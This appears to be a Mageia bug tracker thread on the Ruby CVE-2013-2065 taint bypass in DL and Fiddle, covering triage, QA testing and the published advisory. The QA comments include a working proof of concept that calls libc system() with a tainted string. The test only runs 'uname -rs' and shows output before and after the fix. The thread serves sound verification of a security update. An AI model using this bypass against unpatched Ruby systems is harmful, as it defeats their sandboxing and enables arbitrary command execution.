Slackware has issued an advisory on May 16: http://lwn.net/Alerts/551054/

Mageia 2 is not affected (ruby 1.8 not affected).

The issue is fixed in 1.9.3 p426: http://www.ruby-lang.org/en/news/2013/05/14/taint-bypass-dl-fiddle-cve-2013-2065/
Whiteboard: (none) => MGA3TOO
Wait until mga3 is released. I'll likely propose ruby 2.0 for mga4.
Status: NEW => ASSIGNED
Version: Cauldron => 3
Whiteboard: MGA3TOO => MGA2TOO
Whiteboard: MGA2TOO => (none)
Please test ruby-1.9.3.p429-1.mga3
Assignee: fundawang => qa-bugs
Source RPM: ruby-1.9.3.p392-1.mga3.src.rpm => ruby-1.9.3.p429-1.mga3
Funda, could you remember to add info for QA please.

SRPM: ruby-1.9.3.p429-1.mga3.src.rpm
------------------------------------
lib(64)ruby1.9
ruby-doc
ruby-irb
ruby
ruby-tk
ruby-devel

Testing complete mga3 64

PoC for CVE-2013-2065: http://www.ruby-lang.org/en/news/2013/05/14/taint-bypass-dl-fiddle-cve-2013-2065

Before
------
Needs requires adding to the scripts, so..

    require 'dl'
    require 'dl/import'

    def my_function(user_input)
      # Resolve libc's system() through DL and wrap it as a callable function
      handle    = DL.dlopen(nil)
      sys_cfunc = DL::CFunc.new(handle['system'], DL::TYPE_INT, 'system')
      sys       = DL::Function.new(sys_cfunc, [DL::TYPE_VOIDP])
      sys.call user_input
    end

    # At $SAFE >= 1 a tainted argument should raise SecurityError before reaching system()
    $SAFE = 1
    my_function "uname -rs".taint

When run in irb it outputs..

    irb(main):011:0> my_function "uname -rs".taint
    Linux 3.8.13-desktop-1.mga3
    => 0

Also, for fiddle, adding require 'fiddle'..

    require 'dl'      # DL.dlopen below needs dl; on 1.9.3 fiddle does not load it by itself
    require 'fiddle'

    def my_function(user_input)
      handle = DL.dlopen(nil)
      # Fiddle::Function takes the symbol address, argument types and return type
      sys    = Fiddle::Function.new(handle['system'], [Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT)
      sys.call user_input
    end

    $SAFE = 1
    my_function "uname -rs".taint

Outputs..

    irb(main):010:0> my_function "uname -rs".taint
    Linux 3.8.13-desktop-1.mga3
    => 0

After
-----
Using the same scripts in irb:

    irb(main):011:0> my_function "uname -rs".taint
    SecurityError: tainted parameter not allowed
            from /usr/share/ruby/dl/func.rb:92:in `call'
            from /usr/share/ruby/dl/func.rb:92:in `call'
            from (irb):7:in `my_function'
            from (irb):11
            from /usr/bin/irb:12:in `<main>'

And..

    irb(main):010:0> my_function "uname -rs".taint
    SecurityError: tainted parameter not allowed
            from (irb):6:in `call'
            from (irb):6:in `my_function'
            from (irb):10
            from /usr/bin/irb:12:in `<main>'

So the CVE is confirmed and is now closed.
Whiteboard: (none) => has_procedure mga3-64-OK
Testing complete mga3 32

Validating

SRPM: ruby-1.9.3.p429-1.mga3.src.rpm

Advisory TBC

Could sysadmin please push from 3 core/updates_testing to core/updates when the advisory has been added. Thanks!
Keywords: (none) => validated_update
Whiteboard: has_procedure mga3-64-OK => has_procedure mga3-64-OK mga3-32-ok
CC: (none) => fundawang, sysadmin-bugs
Advisory:
========================

Updated ruby packages fix security vulnerability:

Vulnerability in DL and Fiddle in Ruby before 1.9.3p429 where tainted strings can be used by system calls regardless of the $SAFE level set in Ruby. Native functions exposed to Ruby with DL or Fiddle do not check the taint values set on the objects passed in. This can result in tainted objects being accepted as input when a SecurityError exception should be raised (CVE-2013-2065).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2065
http://www.ruby-lang.org/en/news/2013/05/14/taint-bypass-dl-fiddle-cve-2013-2065/
Update pushed: https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0155
Status: ASSIGNED => RESOLVED
CC: (none) => tmb
Resolution: (none) => FIXED